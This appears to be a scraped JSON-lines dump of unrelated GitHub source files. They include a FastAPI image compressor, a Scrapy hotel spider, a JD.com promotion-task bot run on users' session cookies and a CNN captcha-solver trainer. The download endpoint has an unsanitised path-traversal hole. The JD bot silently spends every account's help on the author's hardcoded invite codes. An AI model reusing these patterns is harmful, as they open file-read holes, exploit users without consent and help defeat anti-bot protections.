compressed_image.save(compressed_file_path, format=\"JPEG\", quality=85)\n compressed_file_paths.append(compressed_file_path)\n\n return compressed_file_paths\n\n\ndef compress_image(image, max_size):\n # Reduce the quality of the image until its size is below the desired limit\n while True:\n buffer = io.BytesIO()\n image.save(buffer, format=\"JPEG\", quality=85) # Adjust quality as needed\n buffer_size = len(buffer.getvalue())\n\n if buffer_size <= max_size * 1024: # Convert max_size to bytes\n break\n\n # Reduce quality further\n image = image.resize((int(image.width * 0.9), int(image.height * 0.9)))\n\n return image\n\n\n@app.get(\"/download_zip/\")\nasync def download_zip(file_dir: str):\n zip_file_path = os.path.join(ZIP_FOLDER, \"compressed_images.zip\")\n\n # Create a zip archive containing all compressed images\n with zipfile.ZipFile(zip_file_path, \"w\") as zipf:\n for root, _, files in os.walk(F\"{COMPRESSED_FOLDER}/{file_dir}\"):\n for file in files:\n file_path = os.path.join(root, file)\n zipf.write(file_path, os.path.relpath(file_path, F\"{COMPRESSED_FOLDER}/{file_dir}\"))\n\n return FileResponse(zip_file_path, filename=\"compressed_images.zip\")\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n","repo_name":"mrizkyff/bulk-image-compress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21880317999","text":"'''\nCreated on Nov 24, 2015\n\n@author: sayed.hussain\n'''\nfrom database.AdvanceSearchDB import check\ndef advanced_search():\n try:\n source=input(\"Enter the source: \")\n destination=input(\"Enter the destinaton: \")\n check(source,destination)\n except Exception as e:\n print(\"some error\")\n print(e)","repo_name":"sayedhussain/Airline-and-Hotel-Reservation-System-Using-python","sub_path":"Flight_Project/functionality/AdvanceSearch.py","file_name":"AdvanceSearch.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14964720816","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport datetime,random\nfrom vivek.models import Contact\n# Create your views here.\ndef index(request):\n count=random.randint(1000,5000)\n time = datetime.datetime.now()\n con={'time':time,\"count\":count}\n return render(request,'vivek/home.html',con)\ndef contact(request):\n if request.method==\"POST\":\n print(request)\n name=request.POST.get('name')\n email=request.POST.get('email')\n phone=request.POST.get('phone')\n subject=request.POST.get('subject')\n print(name,\" \",email)\n contact=Contact()\n contact.name=name\n contact.email=email\n contact.phone=phone\n contact.subject=subject\n contact.save()\n return render(request,'vivek/thanks.html')\n\n \n\n return render(request,'vivek/contact.html')\n\ndef project(request):\n return render(request, 'vivek/projects.html')\n","repo_name":"vivek-nagre/portfolio_dj","sub_path":"Portfolio/vivek/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18080364820","text":"\"\"\" \n--- Day 8: Treetop Tree House ---\nHow many trees are visible from outside the grove? \n\"\"\"\n\nfrom typing import List\n\nwith open(\"/Users/fleigh/Projects/AdventofCode/Dec_8/Data.txt\") as f:\n data = f.read().splitlines()\n\n# initiate the puzzle matrix and size variables\npuzzle: List = []\nfor el in data:\n row = list(el)\n puzzle.append([int(num) for num in row])\n\n\ndef print_matrix(matrix): # practice traversing a matrix\n for i, row in enumerate(matrix):\n for j, element in enumerate(row):\n print(element, i, j)\n# print(print_matrix(puzzle))\n\n\n# Initialize direction vectors\nnRow: List = [0, 1, 0, -1]\nnCol: List = [-1, 0, 1, 0]\nROW_MAX: int = len(puzzle[0])\nCOL_MAX: int = len(puzzle)\nvisited: List = [[False for i in range(ROW_MAX)] for j in range(COL_MAX)]\n\n\ndef is_valid(row:int, col:int): # helper function to confirm if a coordinate is in-bounds\n global ROW_MAX, COL_MAX, visited\n\n # if cell is out of bounds\n if (row < 0 or col < 0 or row >= ROW_MAX or col >= COL_MAX):\n return False\n\n # otherwise, it is valid\n return True\n\ndef is_visited(row:int, col:int): # helper function to confirm if a coordinate is unvisited\n global ROW_MAX, COL_MAX, visited\n\n # if the cell is already visited\n if (visited[row][col]):\n return False\n\n # otherwise, it can be visited\n return True\n\n\ndef is_visible(current: List, neighbors: List, matrix, directions, at_boundary): # helper function to confirm if tree is visible from outside grove\n # default is the tree is visible (directions=[True, True, True, True])\n # default is the neighbor is not on the boundary (at_boundary=[False, False, False, False)\n\n curr_height = matrix[current[0]][current[1]]\n\n # check current visiblity of tree\n for i, el in enumerate(neighbors):\n\n # if it is out of range its at the boundary\n if (is_valid(el[0], el[1]) == False):\n at_boundary[i] = True\n continue\n\n neighbor_height = matrix[el[0]][el[1]]\n\n # if the neighbor is taller then it blocks the current tree from that direction\n if neighbor_height >= curr_height:\n directions[i] = False\n\n # base case: if all directions have a tree that blocks view, the tree is not visible\n if all(item is False for item in directions):\n return False\n\n # base case: if all directions have found the boundary and function is still going, the tree is visible\n if all(item is True for item in at_boundary):\n return True\n\n # else increment neighbors\n # neighbors example [[3,2], [4,3], [3, 4], [2, 3]]\n next_neighbors = neighbors\n next_neighbors[0][1] -= 1 # send north more north\n next_neighbors[1][0] += 1 # send east more east\n next_neighbors[2][1] += 1 # send south more south\n next_neighbors[3][0] -= 1 # send west more west\n\n # and recursively call this function until a coordinate is invalid\n is_visible(current, next_neighbors, matrix, directions, at_boundary)\n\n\n\ndef DFS_traversal(row: int, col: int, matrix): # DFS traversal function to visit every tree once\n global nRow, nCol, visited\n visible_tree_count = 0\n tree_visited_count = 0\n\n # initialize a stack of pairs\n stack: List = []\n stack.append([row, col])\n\n while (len(stack) > 0):\n curr: List = stack.pop()\n row: int = curr[0]\n col: int = curr[1]\n\n # check if current is valid or not\n if (is_valid(row, col) == False):\n continue # skip\n\n # check if current is visited or not\n if (is_visited(row, col) == False):\n continue # skip\n\n # set neighbors back to empty\n neighbors: List = []\n\n # collect neighbors in stack and neighbors array\n for i in range(4):\n neighbor_row: int = row + nRow[i]\n neighbor_col: int = col + nCol[i]\n # neighbor_height = matrix[neighbor_row][neighbor_col]\n stack.append([neighbor_row, neighbor_col])\n neighbors.append([neighbor_row, neighbor_col])\n\n # check if tree is visible\n directions = [True, True, True, True]\n at_boundary = [False, False, False, False]\n if (is_visible(curr, neighbors, matrix ,directions, at_boundary) == True):\n visible_tree_count += 1\n\n # add current to visited\n visited[row][col] = True\n tree_visited_count += 1\n\n return 'visible trees:', visible_tree_count,'trees visited: ', tree_visited_count\n\n# function call\nprint(DFS_traversal(0, 0, puzzle))\n","repo_name":"forestleigh/advent-of-code-2022","sub_path":"Dec_8/tree_house.py","file_name":"tree_house.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3658241933","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from selenium import webdriver\nfrom scrapy.spiders.crawl import CrawlSpider\nimport time\n\n\nclass EskySpider(CrawlSpider):\n name = \"esky-hr\"\n allowed_domains = [\"esky.hr\", \"esky.com\"]\n base_url = \"https://www.esky.hr\"\n start_urls = [\"https://www.esky.hr/hoteli/ci/spu/hoteli-split\"]\n\n def __init__(self):\n CrawlSpider.__init__(self)\n self.browser = webdriver.Firefox()\n\n def __del__(self):\n self.browser.close()\n\n def parse(self, response: scrapy.http.response.html.HtmlResponse):\n self.browser.get(response.url)\n time.sleep(3) # let javascript execute\n body_hxs = scrapy.selector.Selector(text=self.browser.page_source)\n\n for hotel_div in body_hxs.xpath(\"//div[@class='hotel-offer-wrapper']\"):\n hxs = scrapy.selector.Selector(text=hotel_div.extract())\n hotel_name = hxs.xpath(\"//li[@class='hotel-name']/a/span/text()\").get()\n hotel_link = hxs.xpath(\n \"//li[@class='hotel-name']/a[@class='name-link']/@href\"\n ).get()\n yield scrapy.Request(\n self.base_url + hotel_link,\n callback=self.parse_hotel,\n cb_kwargs={\"name\": hotel_name, \"text_eng\": None, \"text_hr\": None},\n )\n\n self.browser.execute_script(\n \"\"\"var link = document.querySelector('a.next');\n if (link) {\n link.click();\n }\"\"\"\n )\n\n def parse_hotel(\n self, response: scrapy.http.response.html.HtmlResponse, name, text_eng, text_hr\n ):\n if text_hr is None:\n text_hr = \"\".join(\n response.xpath(\"//dd[@class='hotel-description']//text()\").extract()\n )\n new_link = response._get_url().replace(\"esky.hr/hoteli\", \"esky.com/hotels\")\n return scrapy.Request(\n new_link,\n callback=self.parse_hotel,\n cb_kwargs={\"name\": name, \"text_eng\": None, \"text_hr\": text_hr},\n )\n else:\n text_eng = \"\".join(\n response.xpath(\"//dd[@class='hotel-description']//text()\").extract()\n )\n if text_hr != text_eng:\n return {\n \"name\": name,\n \"text_eng\": text_eng.strip(),\n \"text_hr\": text_hr.strip(),\n }\n else:\n return None\n","repo_name":"nlitkowski/PJN","sub_path":"croatia/croatia/spiders/esky.py","file_name":"esky.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5996865990","text":"from email import header\nimport os\nimport urllib\nimport requests\nimport time\nimport json\nimport random\nimport re\nfrom urllib import parse\nimport urllib3\nimport sys\nfrom datetime import datetime\nurllib3.disable_warnings()\n\n# 循环任务次数,可以多跑几次没事\ntask_times = 5\n# 间隔时间,默认在任务所需的基础上加,一般设置5s左右就成,看自己\nsleep_times = 5\n\n\nCookies = [\n 'pt_key=xxxx; pt_pin=xxxx;',\n 'pt_key=xxxx; pt_pin=xxxx;',\n]\n\nclass Logger(object):\n def __init__(self, filename='app.log', stream=sys.stdout):\n self.terminal = stream\n self.log = open(filename, 'a', encoding='utf-8')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n self.terminal.flush() # 不启动缓冲,实时输出\n self.log.flush()\n\n def flush(self):\n pass\n\ntoday = datetime.now().strftime(\"%Y-%m-%d\")\nsys.stdout = Logger(f'./jd11-{today}.log', sys.stdout)\nsys.stderr = Logger(f'./jd11-{today}.log', sys.stderr)\n\ntry:\n pass\n # with open('ck.txt', 'r+', encoding='utf-8') as ef:\n # for i in ef:\n # i = i.strip('\\r\\n')\n # Cookies.append(i)\nexcept:\n print('看看有ck.txt文件没,看看放cookie没')\n time.sleep(5)\n sys.exit()\nif Cookies:\n pass\nelse:\n print('看看放cookie没')\n time.sleep(5)\n sys.exit()\n\n\ndef get_user_name(headers):\n cookie = headers['Cookie'] if 'Cookie' in headers else 'None'\n try:\n r = re.compile(r\"pt_pin=(.*?);\")\n userName = r.findall(cookie)\n userName = parse.unquote(userName[0])\n return userName\n except Exception as e:\n r = re.compile(r\"pin=(.*?);\")\n userName = r.findall(cookie)\n userName = parse.unquote(userName[0])\n return userName\n\n# 获取joytoken\ndef get_joytoken(headers):\n url = 'https://rjsb-token-m.jd.com/gettoken'\n data = \"content={\\\"appname\\\":\\\"50168\\\",\\\"whwswswws\\\":\\\"\\\",\\\"jdkey\\\":\\\"a\\\",\\\"body\\\":{\\\"platform\\\":\\\"1\\\",\\\"sceneid\\\":\\\"CXJAssist_h5\\\",\\\"hs\\\":\\\"AAD71C9\\\",\\\"version\\\":\\\"w4.0.5\\\"}}\"\n try:\n res = requests.post(url, headers=headers,\n data=data, verify=False).json()\n joytoken = res.get('joyytoken')\n return joytoken\n except Exception as e:\n print(e)\n return None\n\nprint('\\n\\n欢迎使用jd脚本\\n')\n\ndef get_secretp(headers):\n url = 'https://api.m.jd.com/client.action?advId=promote_getHomeData'\n data = 'functionId=promote_getHomeData&client=m&clientVersion=-1&appid=signed_wh5&body={}'\n try:\n res = requests.post(url, data=data, headers=headers,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n return res.get('data').get('result').get('homeMainInfo').get('secretp')\n else:\n print('初始化失败')\n return None\n except:\n return None\n\ndef get_ss():\n import random,string\n a = [''.join(random.sample(string.ascii_letters + string.digits, 8)),\"-1\"]\n return a\n\n# 逛店\ndef guangdian(taskId, taskToken, itemId, headers,actionType):\n url = 'https://api.m.jd.com/client.action?advId=promote_collectScore'\n ss = get_ss()\n body = {\n \"taskId\": taskId,\n \"taskToken\": taskToken,\n \"actionType\": actionType,\n \"random\": ss[0],\n \"log\": ss[1]\n }\n bodys = json.dumps(body).replace(\" \", \"\")\n data = 'functionId=promote_collectScore&client=m&clientVersion=-1&appid=signed_wh5&body=' + bodys\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n print('进店成功')\n return res\n else:\n print(res.get('data').get('bizMsg'))\n except Exception as e:\n print(e)\n\n# 领取\n\n\ndef lingqu(taskToken, headers):\n url = 'https://api.m.jd.com/client.action?functionId=qryViewkitCallbackResult&client=wh5'\n body = {\n 'dataSource': \"newshortAward\",\n 'method': \"getTaskAward\",\n 'reqParams': \"{\\\"taskToken\\\":\\\"%s\\\"}\" % taskToken,\n 'sdkVersion': \"1.0.0\",\n 'clientLanguage': \"zh\",\n }\n bodys = json.dumps(body)\n data = {\n 'body': bodys,\n }\n try:\n response = requests.post(url, headers=headers,\n data=data, verify=False, timeout=5).json()\n if response.get('code') == '0':\n print(response.get('toast').get('subTitle'))\n else:\n print('其他')\n except Exception as e:\n print(e)\n\n# 加购\n\n\ndef getFeedDetail(taskId, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getFeedDetail'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"taskId\":\"%s\"}' % taskId\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n productInfoVos = res.get('data').get('result').get(\n 'addProductVos')[0].get('productInfoVos')\n return productInfoVos\n except Exception as e:\n print(e)\n# 加购\n\n\ndef getFeedDetail1(taskId, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getFeedDetail'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"taskId\":\"%s\"}' % taskId\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n productInfoVos = res.get('data').get(\n 'result').get('taskVos')[0].get('browseShopVo')\n return productInfoVos\n except Exception as e:\n print(e)\n\n# 任务奖励\ndef getBadgeWard(awardToken, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getBadgeAward'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"awardToken\":\"%s\"}' % awardToken\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n myAwardVo = res.get('data').get('result').get('myAwardVos')[0]\n return myAwardVo\n except Exception as e:\n print(e)\n\n\n# 任务列表\n\n\ndef task_list(headers, data):\n global inviteId_temp_list\n url = \"https://api.m.jd.com/client.action?functionId=promote_getTaskDetail\"\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('code') == 0:\n taskVos = res.get('data').get('result')\n inviteId = taskVos.get(\"inviteId\")\n if inviteId is not None and inviteId not in inviteId_temp_list:\n inviteId_temp_list.append(inviteId)\n print(f'账号:{get_user_name(headers)},助力码:{inviteId}')\n return taskVos\n else:\n print(res.get('msg'))\n except Exception as e:\n print(e)\n\n\ndef vxtask_list(headers, data):\n try:\n taskVos = task_list(headers, data).get('taskVos')\n lists = []\n for i in taskVos:\n taskId = i.get('taskId')\n status = i.get('status')\n taskTitle = i.get('taskName')\n if status == 1:\n waitDuration = i.get('waitDuration')\n shoppingActivityVos = i.get('shoppingActivityVos', '')\n browseShopVos = i.get('browseShopVo', '')\n followShopVos = i.get('followShopVo', '')\n simpleRecordInfoVos = i.get('simpleRecordInfoVo', '')\n # shoppingActivityVos 需领取\n if taskId in [6, 8, 9, 12, 33, 34, 35, 36, 67]: #\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for shop in shoppingActivityVos:\n shopstatus = shop.get('status')\n taskToken = shop.get('taskToken')\n shoptitle = shop.get('title')\n itemId = shop.get('itemId')\n if shopstatus == 1:\n print('任务“%s”' % shoptitle)\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n lingqu(taskToken, headers)\n # shoppingActivityVos 无需领取\n if taskId in [2, 7, 10, 11, 13, 30, 32, 37, 38, 39, 64, 65]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for shop in shoppingActivityVos:\n shopstatus = shop.get('status')\n taskToken = shop.get('taskToken')\n shoptitle = shop.get('title')\n itemId = shop.get('itemId')\n if shopstatus == 1:\n print('任务“%s”' % shoptitle)\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n if taskId in [3]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for browseShop in browseShopVos:\n browsestatus = browseShop.get('status')\n browsetaskToken = browseShop.get('taskToken')\n shopName = browseShop.get('shopName')\n shopId = browseShop.get('shopId')\n if browsestatus == 1:\n print('任务“%s”' % shopName)\n guangdian(taskId, browsetaskToken, shopId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n lingqu(browsetaskToken, headers)\n # 加购\n if taskId in [16, 17, 18, 19, 20, 21, 22, 23]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n productInfoVos = getFeedDetail(taskId, headers)\n for productInfoVo in productInfoVos:\n itemId = productInfoVo.get('itemId')\n taskToken = productInfoVo.get('taskToken')\n skuName = productInfoVo.get('skuName')\n status = productInfoVo.get('status')\n if status == 1:\n print('开始加购“%s”' % skuName)\n ress = guangdian(\n taskId, taskToken, itemId, headers,1)\n times = ress.get('data').get('result').get('times')\n if times == 4:\n break\n print('等待%s秒' % sleep_times)\n time.sleep(sleep_times)\n if taskId in [4]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n browseShopVos = getFeedDetail1(taskId, headers)\n for browseShopVo in browseShopVos:\n itemId = browseShopVo.get('itemId')\n taskToken = browseShopVo.get('taskToken')\n status = browseShopVo.get('status')\n shopName = browseShopVo.get('shopName')\n if status == 1:\n print('开始逛“%s”' % shopName)\n ress = guangdian(\n taskId, taskToken, itemId, headers,1)\n times = ress.get('data').get('result').get('times')\n if times == 5:\n break\n print('等待%s秒' % sleep_times)\n time.sleep(sleep_times)\n if taskId in [28, 61]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n taskToken = simpleRecordInfoVos.get('taskToken')\n itemId = simpleRecordInfoVos.get('itemId')\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n guangdian(taskId, taskToken, itemId, headers,'')\n if taskId == 5:\n taskToken = i.get('simpleRecordInfoVo').get('taskToken')\n ii = 0\n while ii <= 4:\n ress = guangdian(5, taskToken, '', headers,1)\n ii += 1\n time.sleep(sleep_times)\n\n if status == 2:\n print(taskTitle + '任务已完成')\n lotteryTaskVos = task_list(headers, data).get('lotteryTaskVos')\n if lotteryTaskVos is None:\n return\n badge_task_list = lotteryTaskVos[0].get(\"badgeAwardVos\")\n for task in badge_task_list:\n if task.get('status') != 3:\n continue\n awardVo = getBadgeWard(task.get(\"awardToken\"), headers)\n print(f\"完成获取任务次数奖励:{awardVo.get('pointVo').get('score')}\")\n print('等待%s秒' % (sleep_times))\n except Exception as e:\n print(e)\n\n# 助力\n\n\ndef jd_zhuli(inviteId, headers):\n ss = get_ss()\n url = 'https://api.m.jd.com/client.action?functionId=promote_collectScore'\n body = {\n \"actionType\": 0,\n \"inviteId\": \"%s\" % inviteId,\n \"random\": ss[0],\n \"log\": ss[1]\n }\n bodys = json.dumps(body)\n data = 'functionId=promote_collectScore&client=m&clientVersion=-1&appid=signed_wh5&body=%s' % bodys\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n print('助力成功')\n return res\n else:\n print(res.get('data').get('bizMsg'))\n except:\n print('其他')\n\ndef raise_level(headers):\n pass\n\n\ninviteIds = ['ZXASTT0225KkcRx4QplfTKUz1l6UPdQFjRWnqq7zB55awQ', 'ZXASTT012_bkiAkRItguJFjRWnqq7zB55awQ', 'ZXASTT01597g7GU9KrQGJYUMFjRWnqq7zB55awQ', 'ZXASTT0146Lh2RRwZrw2JdwFjRWnqq7zB55awQ']\ninviteId_temp_list = []\n#print('软件放了作者的助力,不想助力的直接输入n 回车即可\\n')\n#print('是否愿意为作者助力:y/n')\ncontent = 'y'\n\nfor Cookie in Cookies:\n headers = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'User-Agent': 'jdapp;iPhone;15.4.1;;;M/5.0;appBuild/168341;Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': '*/*',\n 'Origin': 'https://h5.m.jd.com/',\n 'Referer': 'https://h5.m.jd.com/',\n 'Cookie': Cookie\n }\n joyToken = get_joytoken(headers)\n Cookie = Cookie + ';joyytoken=50168' + joyToken\n headers['Cookie'] = Cookie\n i = 0\n while i < task_times:\n # 京东app任务\n jddata = 'functionId=promote_getTaskDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"appSign\":\"3\"}'\n vxtask_list(headers, jddata)\n # 微信任务\n wxdata = 'functionId=promote_getTaskDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"appSign\":\"2\"}'\n vxtask_list(headers, wxdata)\n # 升级转盘\n raise_level(headers)\n i += 1\n if content != 'n':\n for inviteId in inviteIds:\n jd_zhuli(inviteId, headers)\n time.sleep(sleep_times * 2)\n\nprint(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(time.time()))))\n","repo_name":"crazyzzcc/jd-scripts-docker-4","sub_path":"py/jd11_2022.py","file_name":"jd11_2022.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12791483266","text":"import os\nimport sys\nimport re\nimport time\nimport shutil\nimport random\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as D\nfrom tqdm import tqdm\nfrom const import DATA_CROP_DIR, DATA_TRAIN_DIR, DATA_TEST_DIR, MODEL_DIR, LOG_DIR\n\nCAPTCHA_LABELS = '2345678abcdefghklmnpqrstuvwxy'\nCAPTCHA_SIZE = 52\n\nre_dataset_filename = re.compile(r'^([a-z0-9]{4})_c(\\d)_([a-z0-9])_(\\d+\\-\\d+)\\.png$')\nlogfp = None\n\nclass CaptchaDataset(D.Dataset):\n\n def __init__(self, folder, train_set):\n N = CAPTCHA_SIZE\n captcha_labels_set = frozenset(CAPTCHA_LABELS)\n captcha_labels_indices = np.empty(0x80, dtype=np.uint8)\n\n if train_set:\n Mrot_list = [\n cv2.getRotationMatrix2D((N // 2, N // 2), 7.5 * i, 1.0)\n for i in range(-4, 5)\n ]\n\n for ix, c in enumerate(CAPTCHA_LABELS):\n captcha_labels_indices[ord(c)] = ix\n\n Xlist = []\n ylist = []\n\n for filename in tqdm(sorted(os.listdir(folder))):\n ## TEST ONLY !\n # sep = 0.01 if train_set else 0.01 * 4\n # if np.random.random() > sep:\n # continue\n\n mat = re_dataset_filename.match(filename)\n assert mat is not None, filename\n\n filepath = os.path.join(folder, filename)\n X = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n y = mat.group(3)\n\n assert X.shape == (N, N), X.shape\n assert y in captcha_labels_set, y\n\n y = captcha_labels_indices[ord(y)]\n\n if train_set:\n for Mrot in Mrot_list:\n Xrot = cv2.warpAffine(X, Mrot, X.shape)\n Xlist.append(Xrot)\n ylist.append(y)\n else:\n Xlist.append(X)\n ylist.append(y)\n\n self.X = np.array(Xlist, dtype=np.float32).reshape(-1, 1, N, N)\n self.y = np.array(ylist, dtype=np.int64)\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, ix):\n return self.X[ix], self.y[ix]\n\n\nclass CaptchaCNN(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.bn0 = nn.BatchNorm2d(1)\n self.bn1 = nn.BatchNorm2d(16)\n self.bn2 = nn.BatchNorm2d(32)\n self.bn3 = nn.BatchNorm2d(64)\n self.bn4 = nn.BatchNorm2d(128)\n self.bn5 = nn.BatchNorm2d(256)\n self.bn6 = nn.BatchNorm2d(512)\n self.conv1 = nn.Conv2d(1, 16, 3)\n self.conv2 = nn.Conv2d(16, 32, 3)\n self.conv3 = nn.Conv2d(32, 64, 3)\n self.conv4 = nn.Conv2d(64, 128, 3)\n self.conv5 = nn.Conv2d(128, 256, 3)\n self.conv6 = nn.Conv2d(256, 512, 3)\n self.fc1 = nn.Linear(2048, 512)\n self.fc2 = nn.Linear(512, 128)\n self.fc3 = nn.Linear(128, len(CAPTCHA_LABELS)) # 29\n\n def forward(self, x):\n x = self.bn0(x) # batch*1*52*52\n x = F.relu(x)\n x = self.conv1(x) # batch*16*50*50\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x) # batch*32*48*48\n x = self.bn2(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*32*24*24\n x = self.conv3(x) # batch*64*22*22\n x = self.bn3(x)\n x = F.relu(x)\n x = self.conv4(x) # batch*128*20*20\n x = self.bn4(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*128*10*10\n x = self.conv5(x) # batch*256*8*8\n x = self.bn5(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*256*4*4\n x = self.conv6(x) # batch*512*2*2\n x = self.bn6(x)\n x = F.relu(x)\n x = torch.flatten(x, 1) # batch*2048\n x = self.fc1(x) # batch*512\n x = F.relu(x)\n x = self.fc2(x) # batch*128\n x = F.relu(x)\n x = self.fc3(x) # batch*29\n x = F.log_softmax(x, dim=1)\n return x\n\n\ndef cnn_train(model, train_loader, optimizer, epoch):\n log_interval = max(1, int(len(train_loader) * 0.05))\n\n model.train()\n\n for ix, (data, target) in enumerate(train_loader):\n if torch.cuda.is_available():\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model(data)\n\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n if ix % log_interval == 0:\n line = 'Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch,\n ix * len(data),\n len(train_loader.sampler),\n 100.0 * ix / len(train_loader),\n loss.item()\n )\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n\ndef cnn_test(model, test_loader, epoch):\n test_loss = 0\n correct = 0\n confusion_matrix = np.zeros((len(CAPTCHA_LABELS), len(CAPTCHA_LABELS)), dtype=np.int)\n\n model.eval()\n\n with torch.no_grad():\n for Xlist, ylist in test_loader:\n if torch.cuda.is_available():\n Xlist = Xlist.cuda()\n ylist = ylist.cuda()\n\n output = model(Xlist)\n test_loss += F.nll_loss(output, ylist).item() / len(test_loader.sampler)\n ypred = output.argmax(dim=1, keepdim=True)\n correct += ypred.eq(ylist.view_as(ypred)).sum().item()\n for t, p in zip(ylist.view(-1), ypred.view(-1)):\n confusion_matrix[t.long(), p.long()] += 1\n\n line = '\\nTest set: Average loss: {:.6f}, Accuracy: {}/{} ({:.4f}%)'.format(\n test_loss,\n correct,\n len(test_loader.sampler),\n 100.0 * correct / len(test_loader.sampler)\n )\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n df = pd.DataFrame(\n data=confusion_matrix,\n index=list(CAPTCHA_LABELS),\n columns=list(CAPTCHA_LABELS),\n )\n filepath = os.path.join(LOG_DIR, \"confusion_matrix.epoch_%d.csv\" % epoch)\n df.to_csv(filepath)\n\n\ndef build_train_test_set(train_size):\n shutil.rmtree(DATA_TRAIN_DIR)\n os.mkdir(DATA_TRAIN_DIR)\n shutil.rmtree(DATA_TEST_DIR)\n os.mkdir(DATA_TEST_DIR)\n\n train_cnt = 0\n test_cnt = 0\n\n for filename in tqdm(sorted(os.listdir(DATA_CROP_DIR))):\n src = os.path.join(DATA_CROP_DIR, filename)\n\n if random.random() <= train_size:\n dst = os.path.join(DATA_TRAIN_DIR, filename)\n train_cnt += 1\n else:\n dst = os.path.join(DATA_TEST_DIR, filename)\n test_cnt += 1\n\n shutil.copyfile(src, dst)\n\n print(\"Train set size: %d\" % train_cnt)\n print(\"Test set size: %d\" % test_cnt)\n print(\"Actual train_size: %.3f\" % (train_cnt / (train_cnt + test_cnt)))\n\n\ndef train_model():\n global logfp\n\n logfp = open(os.path.join(LOG_DIR, \"console.%d.log\" % int(time.time() * 1000)), 'w')\n\n batch_size = 64\n epochs = 15\n\n train_dataset = CaptchaDataset(DATA_TRAIN_DIR, train_set=True)\n test_dataset = CaptchaDataset(DATA_TEST_DIR, train_set=False)\n\n train_loader = D.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n test_loader = D.DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n model = CaptchaCNN()\n\n if torch.cuda.is_available():\n model.cuda()\n\n optimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1)\n\n for epoch in range(1, epochs+1):\n t1 = time.time()\n\n 